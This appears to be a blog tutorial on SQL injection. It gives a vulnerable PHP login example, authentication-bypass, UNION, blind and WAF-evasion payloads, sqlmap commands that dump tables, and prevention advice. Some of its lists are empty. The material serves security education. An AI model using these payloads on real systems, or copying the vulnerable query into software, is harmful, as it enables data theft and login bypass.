tutorials March 16, 2026 9 min read

SQL Injection Explained: From Basics to Exploitation

SQL injection remains one of the most critical web application vulnerabilities, consistently ranking in OWASP's top 10 security risks. This comprehensive guide will take you from understanding the fundamentals to recognizing and exploiting SQL injection vulnerabilities in real-world scenarios.

Whether you're a penetration tester, bug bounty hunter, or cybersecurity student, mastering SQL injection is essential for understanding how attackers compromise databases and how developers can protect their applications. By the end of this tutorial, you'll have the knowledge to identify, exploit, and prevent SQL injection attacks.

What is SQL Injection?

SQL injection (SQLi) is a code injection technique that exploits vulnerabilities in an application's database layer. It occurs when user-supplied input is directly incorporated into SQL queries without proper validation or sanitization, allowing attackers to manipulate the intended database operations.

When successful, SQL injection attacks can lead to:

How SQL Injection Works

To understand SQL injection, let's examine a vulnerable login form. Consider this PHP code that processes user authentication:

$username = $_POST['username'];
$password = $_POST['password'];

$query = "SELECT * FROM users WHERE username = '$username' AND password = '$password'";
$result = mysql_query($query);

This code directly inserts user input into the SQL query. An attacker can manipulate the query logic by entering malicious input. For example, entering ' OR '1'='1 as the username would result in:

SELECT * FROM users WHERE username = '' OR '1'='1' AND password = ''

Since '1'='1' is always true, this query would return all users, effectively bypassing authentication.

Types of SQL Injection Attacks

Understanding different SQL injection types is crucial for comprehensive testing and defense. Each type requires specific techniques and tools for successful exploitation.

1. Classic (In-Band) SQL Injection

This is the most straightforward type where the attacker uses the same communication channel to launch the attack and gather results. It includes:

Error-Based SQL Injection: Exploits database error messages to extract information. Attackers intentionally cause database errors to reveal structural details.

' UNION SELECT 1,version(),3,4--

Union-Based SQL Injection: Uses the UNION SQL operator to combine results from multiple SELECT statements, allowing data extraction from other tables.

' UNION SELECT username,password FROM admin_users--

2. Blind SQL Injection

When the application doesn't return database errors or data directly, attackers use blind techniques to infer information based on application behavior.

Boolean-Based Blind SQLi: Uses conditional statements to determine if conditions are true or false based on application responses.

' AND (SELECT SUBSTRING(username,1,1) FROM users WHERE id=1)='a'--

Time-Based Blind SQLi: Uses database sleep functions to cause delays, indicating successful query execution.

' AND IF(1=1,SLEEP(5),0)--

3. Out-of-Band SQL Injection

This advanced technique uses different communication channels to launch attacks and collect data, often through DNS or HTTP requests to attacker-controlled servers.

Practical SQL Injection Exploitation

Let's walk through a practical exploitation scenario using a vulnerable web application. We'll demonstrate the step-by-step process of identifying and exploiting SQL injection vulnerabilities.

Step 1: Identifying Vulnerable Parameters

Start by testing input fields, URL parameters, and form data for SQL injection. Common injection points include:

Test with simple payloads to trigger errors:

'
"
' OR '1'='1
" OR "1"="1
' OR 1=1--
) OR 1=1--

Step 2: Determining the Database Type

Different databases have unique syntax and functions. Identify the database type using specific functions:

# MySQL
' AND @@version--

# PostgreSQL  
' AND version()--

# Microsoft SQL Server
' AND @@version--

# Oracle
' AND (SELECT banner FROM v$version WHERE rownum=1)--

Step 3: Enumerating Database Structure

Once you've confirmed SQL injection, map the database structure to understand what data is available:

# List databases (MySQL)
' UNION SELECT schema_name,2,3 FROM information_schema.schemata--

# List tables
' UNION SELECT table_name,2,3 FROM information_schema.tables WHERE table_schema=database()--

# List columns
' UNION SELECT column_name,2,3 FROM information_schema.columns WHERE table_name='users'--

Step 4: Extracting Data

With the database structure mapped, extract sensitive information:

# Extract user data
' UNION SELECT username,password,email FROM users--

# Extract specific records
' UNION SELECT username,password,3 FROM users WHERE role='admin'--

Advanced SQL Injection Techniques

Beyond basic exploitation, advanced techniques can help bypass security measures and extract data more efficiently.

Bypassing Web Application Firewalls (WAF)

Modern applications often employ WAFs to detect and block SQL injection attempts. Common bypass techniques include:

# Case variation
' UnIoN SeLeCt 1,2,3--

# Comment insertion  
' UNION/*comment*/SELECT/*comment*/1,2,3--

# URL encoding
%27%20UNION%20SELECT%201,2,3--

# Double URL encoding
%2527%2520UNION%2520SELECT%25201,2,3--

Automated SQL Injection with SQLMap

SQLMap is a powerful automated SQL injection tool that can detect and exploit SQL injection vulnerabilities efficiently:

# Basic usage
sqlmap -u "http://target.com/page.php?id=1"

# Specify parameter to test
sqlmap -u "http://target.com/login.php" --data="username=test&password=test" -p username

# Extract database information
sqlmap -u "http://target.com/page.php?id=1" --dbs

# Dump specific table
sqlmap -u "http://target.com/page.php?id=1" -D database_name -T users --dump

Prevention and Mitigation Strategies

Understanding exploitation techniques is only valuable when paired with effective prevention strategies. Here are essential security measures:

Parameterized Queries (Prepared Statements)

The most effective defense against SQL injection is using parameterized queries:

# PHP PDO example
$stmt = $pdo->prepare("SELECT * FROM users WHERE username = ? AND password = ?");
$stmt->execute([$username, $password]);

Input Validation and Sanitization

Implement strict input validation:

Principle of Least Privilege

Database users should have minimal necessary permissions:

Testing and Detection Tools

Effective SQL injection testing requires the right tools and methodologies. Here are essential tools for security professionals:

Manual Testing Tools

Automated Scanners

Conclusion and Next Steps

SQL injection remains a critical vulnerability that every cybersecurity professional must understand. From basic authentication bypasses to advanced blind injection techniques, mastering these concepts is essential for both offensive and defensive security operations.

Your next steps should include:

  1. Practice on legal platforms like DVWA, SQLi Labs, or HackTheBox
  2. Learn to use SQLMap effectively for automated testing
  3. Study different database systems and their unique SQL syntax
  4. Understand advanced bypasses for modern security controls
  5. Explore NoSQL injection techniques for modern applications

Remember to always practice ethical hacking principles and only test on systems you own or have explicit permission to test. SQL injection skills are powerful tools that must be used responsibly to improve security, not cause harm.

Continue your cybersecurity journey by exploring our related tutorials on web application security, penetration testing methodologies, and secure coding practices.

Want more cybersecurity tutorials delivered to your inbox?

Subscribe Free →